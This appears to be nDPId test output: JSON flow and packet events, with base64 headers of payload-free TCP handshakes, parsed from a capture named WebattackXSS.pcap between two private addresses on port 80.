+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5748,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":406,"flow_packet_id":1,"flow_last_seen":1499347654065,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347654065,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8q1xAAD4GGnSsEAABwKgKMuhuAFBOzi1kAAAAAKACchBynwAAAgQFtAQCCAoBO4Y4AAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5749,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":406,"flow_packet_id":2,"flow_last_seen":1499347654065,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347654065,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6G55d2lhTs4tZaAScSA1EwAAAgQFtAQCCAoD5VetATuGOAEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5751,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":406,"flow_packet_id":3,"flow_last_seen":1499347654068,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347654068,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0q11AAD4GGnusEAABwKgKMuhuAFBOzi1leXdpYoAQAOXUGQAAAQEICgE7hjkD5Vet"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5757,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":407,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347655367,"flow_last_seen":1499347655367,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347655367,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59516,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5757,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":407,"flow_packet_id":1,"flow_last_seen":1499347655367,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347655367,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8wQ9AAD4GBMGsEAABwKgKMuh8AFCmFkZxAAAAAKACchAA9gAAAgQFtAQCCAoBO4d+AAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5758,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":407,"flow_packet_id":2,"flow_last_seen":1499347655367,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347655367,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6HyXTysMphZGcqAScSDioAAAAgQFtAQCCAoD5VjzATuHfgEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5760,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":407,"flow_packet_id":3,"flow_last_seen":1499347655371,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347655371,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0wRBAAD4GBMisEAABwKgKMuh8AFCmFkZyl08rDYAQAOWBqAAAAQEICgE7h34D5Vjz"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5769,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":408,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347656622,"flow_last_seen":1499347656622,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347656622,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59530,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5769,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":408,"flow_packet_id":1,"flow_last_seen":1499347656622,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347656622,"pkt":"ABm5CmnxAMGxFOsxCABFAAA83x1AAD4G5rKsEAABwKgKMuiKAFBnH1eqAAAAAKACchAtbQAAAgQFtAQCCAoBO4i3AAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5770,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":408,"flow_packet_id":2,"flow_last_seen":1499347656622,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347656622,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6Ios50nrZx9Xq6AScSBZZwAAAgQFtAQCCAoD5VotATuItwEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5772,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":408,"flow_packet_id":3,"flow_last_seen":1499347656624,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347656624,"pkt":"ABm5CmnxAMGxFOsxCABFAAA03x5AAD4G5rmsEAABwKgKMuiKAFBnH1erLOdJ7IAQAOX4bQAAAQEICgE7iLgD5Vot"} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5786,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":327,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347523488,"flow_last_seen":1499347528757,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347657882,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58102,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5786,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":327,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347523488,"flow_last_seen":1499347528757,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347657882,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58102,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5786,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":328,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499347524782,"flow_last_seen":1499347530758,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347657882,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58116,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5786,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":328,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499347524782,"flow_last_seen":1499347530758,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347657882,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58116,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5786,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":329,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347526155,"flow_last_seen":1499347531758,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347657882,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58130,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5786,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":329,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347526155,"flow_last_seen":1499347531758,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347657882,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58130,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5786,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":330,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347527425,"flow_last_seen":1499347532758,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347657882,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58144,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5786,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":330,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347527425,"flow_last_seen":1499347532758,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347657882,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58144,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5786,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":331,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347528679,"flow_last_seen":1499347533759,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347657882,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58158,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5786,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":331,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347528679,"flow_last_seen":1499347533759,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347657882,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58158,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5786,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":332,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347531303,"flow_last_seen":1499347536759,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347657882,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58184,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5786,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":332,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347531303,"flow_last_seen":1499347536759,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347657882,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58184,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5786,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":333,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347532560,"flow_last_seen":1499347537760,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347657882,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58198,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5786,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":333,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347532560,"flow_last_seen":1499347537760,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347657882,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58198,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5789,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":409,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347659123,"flow_last_seen":1499347659123,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347659123,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59556,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5789,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":409,"flow_packet_id":1,"flow_last_seen":1499347659123,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347659123,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8x6pAAD4G\/iWsEAABwKgKMuikAFB+qkyDAAAAAKACchAefQAAAgQFtAQCCAoBO4spAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5790,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":409,"flow_packet_id":2,"flow_last_seen":1499347659123,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347659123,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6KSKjQS\/fqpMhKAScSAvjAAAAgQFtAQCCAoD5VyeATuLKQEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5792,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":409,"flow_packet_id":3,"flow_last_seen":1499347659124,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347659124,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0x6tAAD4G\/iysEAABwKgKMuikAFB+qkyEio0EwIAQAOXOkwAAAQEICgE7iykD5Vye"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5801,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":410,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347660441,"flow_last_seen":1499347660441,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347660441,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59570,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5801,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":410,"flow_packet_id":1,"flow_last_seen":1499347660441,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347660441,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8SJ9AAD4GfTGsEAABwKgKMuiyAFDQzcTuAAAAAKACchBSmAAAAgQFtAQCCAoBO4xxAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5802,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":410,"flow_packet_id":2,"flow_last_seen":1499347660441,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347660441,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6LJiYdyB0M3E76AScSCyxwAAAgQFtAQCCAoD5V3nATuMcQEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5805,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":410,"flow_packet_id":3,"flow_last_seen":1499347660448,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347660448,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0SKBAAD4GfTisEAABwKgKMuiyAFDQzcTvYmHcgoAQAOVRzQAAAQEICgE7jHMD5V3n"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5813,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":411,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347661705,"flow_last_seen":1499347661705,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347661705,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59584,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5813,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":411,"flow_packet_id":1,"flow_last_seen":1499347661705,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347661705,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8iZ5AAD4GPDKsEAABwKgKMujAAFBNGwQwAAAAAKACchCVvgAAAgQFtAQCCAoBO42uAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5815,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":411,"flow_packet_id":2,"flow_last_seen":1499347661705,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347661705,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6MCaW9JGTRsEMaAScSDG8gAAAgQFtAQCCAoD5V8jATuNrgEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5817,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":411,"flow_packet_id":3,"flow_last_seen":1499347661709,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347661709,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0iZ9AAD4GPDmsEAABwKgKMujAAFBNGwQxmlvSR4AQAOVl+QAAAQEICgE7ja8D5V8j"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5831,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":412,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347664226,"flow_last_seen":1499347664226,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347664226,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59610,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5831,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":412,"flow_packet_id":1,"flow_last_seen":1499347664226,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347664226,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8Ye5AAD4GY+KsEAABwKgKMujaAFDKDfHLAAAAAKACchAonwAAAgQFtAQCCAoBO5AlAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5832,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":412,"flow_packet_id":2,"flow_last_seen":1499347664227,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347664227,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6NqT+P5Dyg3xzKAScSAxwgAAAgQFtAQCCAoD5WGaATuQJQEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5833,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":412,"flow_packet_id":3,"flow_last_seen":1499347664227,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347664227,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0Ye9AAD4GY+msEAABwKgKMujaAFDKDfHMk\/j+RIAQAOXQyQAAAQEICgE7kCUD5WGa"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5843,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":413,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347665473,"flow_last_seen":1499347665473,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347665473,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59624,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5843,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":413,"flow_packet_id":1,"flow_last_seen":1499347665473,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347665473,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8f9VAAD4GRfusEAABwKgKMujoAFDrVO6JAAAAAKACchAJVQAAAgQFtAQCCAoBO5FcAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5844,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":413,"flow_packet_id":2,"flow_last_seen":1499347665473,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347665473,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6OhBKwT561TuiqAScSBdWQAAAgQFtAQCCAoD5WLRATuRXAEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5845,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":413,"flow_packet_id":3,"flow_last_seen":1499347665474,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347665474,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0f9ZAAD4GRgKsEAABwKgKMujoAFDrVO6KQSsE+oAQAOX8XwAAAQEICgE7kV0D5WLR"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5864,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":414,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347668069,"flow_last_seen":1499347668069,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347668069,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59650,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5864,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":414,"flow_packet_id":1,"flow_last_seen":1499347668069,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347668069,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8TE1AAD4GeYOsEAABwKgKMukCAFANB9+oAAAAAKACchDz4AAAAgQFtAQCCAoBO5PlAAAAAAEDAwc="} 